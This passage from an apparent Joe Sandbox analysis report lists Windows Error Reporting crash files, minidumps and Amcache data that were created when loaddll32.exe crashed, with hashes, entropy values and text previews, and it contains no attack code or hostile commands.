                        • Excluded IPs from analysis (whitelisted): 20.189.173.20
                        • Excluded domains from analysis (whitelisted): blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_88e9c9cb640b4f665f2020b110738337d7578_d70d8aa6_0e51d8a3\Report.wer
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6756145565292645
                        Encrypted:false
                        SSDEEP:96:02kzeRZqyUy9hkoyt7Jf0pXIQcQ5c6A2cE2cw33+a+z+HbHg0VG4rmMOyWZAXGn/:KCBDHnM28jjAq/u7szS274ItW
                        MD5:7D72F4ABE55A3CF1934F6D538B8C2D86
                        SHA1:D07087BD4AF3A72904384DF44EADEA44311991AE
                        SHA-256:E78FAB3561446DCE38A125DCD8E916623245DD1BDF82AFB547FBF8896C410F10
                        SHA-512:E26E509FB3D56DB5D83D6232AE74451605195FE55CE64678436DB53F51A90F83E4A4D0D7AE6F4FC618C71E84C145DB15AFF0439071C2824F602430B05EEE1467
                        Malicious:false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.8.5.1.6.6.6.7.4.8.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.0.3.5.9.d.c.-.d.4.e.2.-.4.6.4.b.-.8.2.3.4.-.6.6.6.e.c.7.6.d.8.8.7.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.b.c.d.8.b.7.-.f.f.2.e.-.4.7.1.d.-.9.3.7.3.-.6.b.a.f.5.9.6.6.d.6.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.4.-.0.0.0.1.-.0.0.1.b.-.2.2.d.b.-.0.d.1.6.5.9.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_c048235b2cbfcf49ff1eab6d2a64f8e0c646d63f_d70d8aa6_0a5a0f82\Report.wer
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6822455764004985
                        Encrypted:false
                        SSDEEP:96:OvFyRieRZqyHy9hko47JAbpXIQcQfc6XOCecEccw3VF+a+z+HbHg0VG4rmMOyWZy:ModB2HROmTjAq/u7szS274ItWE
                        MD5:964828FF6CE3A40D461A1AA086233179
                        SHA1:767AA570C480EFC59C130DB76905A7EFDBB1FFFE
                        SHA-256:A5DCE1E7509202FEED638DBBF2812B4A21817B2A7A413D7A30F61DC876C0CA55
                        SHA-512:CE3DFFC6F8A60AE0C60C92A57A7565B0917CDBA8E7CDC72FAE3A96FA776611BD09666B8BC8B7FCE2E2B5DA80A0E5D373D5D59EC495C28E820B85161D7737FBC7
                        Malicious:false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.8.5.2.6.2.5.9.9.5.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.9.0.8.5.3.2.3.5.3.7.2.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.d.c.8.9.3.e.-.a.7.9.d.-.4.a.5.2.-.a.2.8.1.-.2.9.7.d.0.7.3.7.b.d.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.e.7.5.2.4.9.-.f.4.8.2.-.4.d.5.0.-.8.8.c.8.-.f.4.2.f.1.3.1.f.1.d.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.4.-.0.0.0.1.-.0.0.1.b.-.2.2.d.b.-.0.d.1.6.5.9.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER9086.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):48284
                        Entropy (8bit):3.064575500594621
                        Encrypted:false
                        SSDEEP:768:faHAH2EE06gO/xN0Cc+fvx+o2kXN0Tt1UvCWKex:faHAH27z/xN0Cc+fZ+LkXN0TsvCw
                        MD5:24DB966EEB0FC1CDAD34E833BC86926B
                        SHA1:5A1F93E8E1BF7A7EEBFE42D60E9AA535F0427222
                        SHA-256:DC67B0470D68EE39441441DFF45DC3188E7668BD9BDCEDF8E7D2220FD0F13261
                        SHA-512:BD4E45874F8AB77602CB2A08DA9217DE5F74DEF1BD8C00B73DB3C273DF04EDEE51DE2F2B28ED5D90153B005DB74A05027311B06A3A4CAF9C4690817E05B0941E
                        Malicious:false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER9411.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.6947025218296834
                        Encrypted:false
                        SSDEEP:96:9GiZYWJiMCpY+YjWQf4Hv3YEZZ3t2i+qiDYwbwsDuaf+Nkit8yIrF7E3:9jZDaZKf0W/uaf+Nkit0xg3
                        MD5:D7560271D5696DFF7E89E6D468B6566A
                        SHA1:A176CE8E971A6B6F8FEFD4094FB014A1D3E40FBC
                        SHA-256:6A69C27C6D833221AFDC1D68516B794DC20D7F0F32DC7F43F7C638B5E8DF20F8
                        SHA-512:3C0F727637717489FCF8B812FBE8434814D91FE644818CE7778983C430D11FFEEF7A7DCFEFACFBE93E92DF652609EE4DD27BF2E879D3ABE62C13CE027885D7AA
                        Malicious:false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBAB5.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47916
                        Entropy (8bit):3.0657592141709396
                        Encrypted:false
                        SSDEEP:768:zJH4H+q3EHAif/xA0CfRf1x+R2gXNsH9NvhBQ:zJH4H+qxk/xA0CfRfr+wgXNsdNvQ
                        MD5:6665D9878FAF494911E6B7C62A58D2D7
                        SHA1:1C01EA5588275E6120F02CB8D57FE7A861F3149C
                        SHA-256:0EDD787812D978427BDAC58FB37EE3F9E5F0A123939834FA4506BA601F2F99EF
                        SHA-512:AB04293F8C9C004785769819860150E8760FDB82000D0FCB82C1CB3FC9B448A6390C024978C6A44ED0CEE5ADAAC6CC44B2218EE2BD21BFF3AF46795D73B9A4C4
                        Malicious:false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE9E.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.6943260976058023
                        Encrypted:false
                        SSDEEP:96:9GiZYWDlO34G+YAYTWQ5BfHv3YEZ6wt2irqsD1wkFHnaPDJB2aHIrC3:9jZDDdXakStaPDJB2aorC3
                        MD5:F30AEAC73E31C150884479821895BC15
                        SHA1:EEA9561078BCC7EA363674F656C41E4F3B07B649
                        SHA-256:83647C24100343C5B10599031E032289A7D3446DF303F5A792396D9D0433548A
                        SHA-512:CC6FC62F703A469A574A87DDA8AD9FF2E475185484E04631AF59381BF0DFD6A2296E738E9A9C8E5AB6ED2381B7AAB2A1218291DB3AA5596DA43C1B6DA10C5F28
                        Malicious:false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD58.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:48:37 2021, 0x1205a4 type
                        Category:dropped
                        Size (bytes):26720
                        Entropy (8bit):2.4946307191848325
                        Encrypted:false
                        SSDEEP:192:OjP2djECpOcLy8kKfLvPe59JHtF2gKMKgESIWYQ0lwu:/dScLQKf7ePJHtFPKgESIWWd
                        MD5:668299165E581DFB4EC56AF4DA29CC9A
                        SHA1:9BC4E162C5CBFBA7F2B32A9A068801B6AD69DBC5
                        SHA-256:8BBFDC90586F63AF686348E8F4253FB633BFF1B4719376B35D7CA2AC92AA3C35
                        SHA-512:BD7E95E74D859B50D61BFDDE331841C0B26643FF24707583B22EE4D62019749071FB0D666B712CFF653E4FC844E00FE93BEA4836D1A4E37588699DEC33AFFC30
                        Malicious:false
                        Preview: MDMP....... .......e..a............4...............H.......$...........................`.......8...........T...........h....[...........................................................................................U...........B......p.......GenuineIntelW...........T.............a+............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD009.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8344
                        Entropy (8bit):3.7012749138332923
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNij/616YrwSUAOS5gmfOSzC+pBO89bagsfiem:RrlsNi7616Y8SUAOS5gmfOSz7azfC
                        MD5:9855971D4F8C6755C81CB40782196D2D
                        SHA1:48B98CDE291834C7596C66B818023FA93BE6CD65
                        SHA-256:A9A13C4F03943D81FE2068A2E68503982D0A8B0AD5FCC3FB6E0B284F3A7BD149
                        SHA-512:A2DF6C7AB6DE0128939EF00E276A47E4A24A42D74C1346BC6B221D987432EC5FCF95C6114A50918AC5AD7C179D79820137E854909C28E33CA73A67416659B55F
                        Malicious:false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.1.2.<./.P.i.d.>.......
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD23C.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4598
                        Entropy (8bit):4.479031705373616
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsUJgtWI9ZXVWSC8BaT8fm8M4J2yvZFy+q84WzAAKcQIcQwQjd:uITfS6XkSNRJBmw3KkwQjd
                        MD5:B4A9DA433AC1D9E362A5DAD1943FE0D0
                        SHA1:A5FA84A7B491F4F779C846441241683E7986F6C5
                        SHA-256:095D6CC0CEDF6669C71FD8A4C722AE3776075F657E587FE6798C7E40B2891645
                        SHA-512:ACBF62F688B398009A6D0ACD46C621FBA4BDD35BEA601E5561785662B88AC6CA9D5EAEF31351B4B997700697AA48652E94C32421DE14528ECEAED583778A0E70
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279799" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2D2.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:48:46 2021, 0x1205a4 type
                        Category:dropped
                        Size (bytes):1049284
                        Entropy (8bit):1.3618305077272557
                        Encrypted:false
                        SSDEEP:6144:sZC+yOyIFsYRY5wv2idk9dIO9X4IfmF0Y:sZC+3yIFsYRY5wv2idk9dIO9X4Ifmf
                        MD5:182EE711EFBB48A000D21A4025050EBA
                        SHA1:F56E4490ED399160E4F462AC77833CD60E9D508D
                        SHA-256:65D78BEF20AC7E6E685598076A3A2F0F16FC84F1CD2D525359824BFA8AD60D2B
                        SHA-512:BA75A3F3575D3F97F3A81910B399A5FBDB42684A47B738C1023EB6C3D141017E03A6FF1EF1158835FFEF16D7AF094D61F4C8C07EA4F5E98BC4AE7E02F1B59AF1
                        Malicious:false
                        Preview: MDMP....... .......n..a............4...............H.......$...........................`.......8...........T...........@................................................................................................U...........B......p.......GenuineIntelW...........T.............a+............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA07.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8344
                        Entropy (8bit):3.697976825375663
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNij86e6YrWSUaQMigmfMSr+pDE89b6gsfBrvem:RrlsNi46e6YaSUaQMigmfMSm6zfBT
                        MD5:8FD8DB7F9A53E91CA59833375EFE8F0A
                        SHA1:292DD396ADD6F4F9B2A932294BDA3BBEA729C6DD
                        SHA-256:112BE52F4BA19CE115CD3B7A9DED401B89B60B1335C2F4CA8208A9A4D421B822
                        SHA-512:6D843C1BD91F06744967550479F6F3791D317997CC0E0AB0BC0224A1EE62B0270262E5FC6BF7C4A06097B8FABACF1DBF4278A2EA598FF7D05F3EDBC7DC18549D
                        Malicious:false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.1.2.<./.P.i.d.>.......
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC98.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4598
                        Entropy (8bit):4.471993005702466
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsUJgtWI9ZXVWSC8BG8fm8M4J2yYSFs+q84tXTAKcQIcQwQjd:uITfS6XkSNlJKzBkKkwQjd
                        MD5:29B3B0F36F70D8DCC36137B0E55629ED
                        SHA1:36790ADAF12BB3533040208BB690B44DFBF4B565
                        SHA-256:274E5FD94681AB1922D722D0CE3DFB8031667A71ADAE9108FB3A54221277F59E
                        SHA-512:8CFF0507791544D2D10C805A866E312EBB8236C2FF8AE28B2311D960E9A5A27999F28B7580E7647A4E184E93EF789FF99FD84F488EF289A3019B29D25BDA727C
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279799" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\Windows\appcompat\Programs\Amcache.hve
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.239475479455116
                        Encrypted:false
                        SSDEEP:12288:WpTzoGkFsGCGs0BWF49FpiyRcoUlSDJrN/3Nih3JwAFBRZ66:kTzoGkFsGCx0BW+Lc
                        MD5:5942A5349380C9C3CFAAFE1AB1AA7BF6
                        SHA1:491E397ACAD84B01D2426760063F069A6297B40A
                        SHA-256:D7D875CC7C0AD81C7119175FE75C9D5020633B565DA3D66463BAF70376C4DB1B
                        SHA-512:096BE1DF130697E6DF60D63DB9252C85B606308422423A38EC1479416C9EA144817443DA7AA19F2ED483BE92566608D464D288C6687B3E40E1972D7E4748F9AD
                        Malicious:false
